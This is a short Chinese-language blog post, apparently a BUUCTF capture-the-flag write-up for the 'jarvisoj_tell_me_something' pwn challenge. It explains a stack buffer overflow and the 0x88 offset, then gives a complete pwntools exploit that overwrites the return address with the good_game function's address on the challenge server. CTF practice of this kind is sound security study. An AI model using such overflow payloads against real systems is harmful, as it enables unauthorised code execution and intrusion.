BUUCTF jarvisoj_tell_me_something

发表于 2025-02-13 更新于 2025-09-23 分类于 PWN ，刷题记录， stack 阅读次数：

用IDA打开

思路基本就是利用栈溢出，执行good_game函数。
但是有一点，这个汇编可以看到没leave。可以和rip对比一下
本题无leave

rip有leave

无leave的话就不用加0x08,直接0x88就可以了

编写exp

from pwn import *
#r = process('./pwn')
r = remote("node5.buuoj.cn", 29720)
getshell = 0x400620
payload_1 = b'a'*(0x88) + p64(getshell)
r.sendline(payload_1)
r.interactive()

得到flag

本文作者： linkpwn
本文链接： http://linkpwn.github.io/2025/02/13/BUUCTF-jarvisoj-tell-me-something/
版权声明： 本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！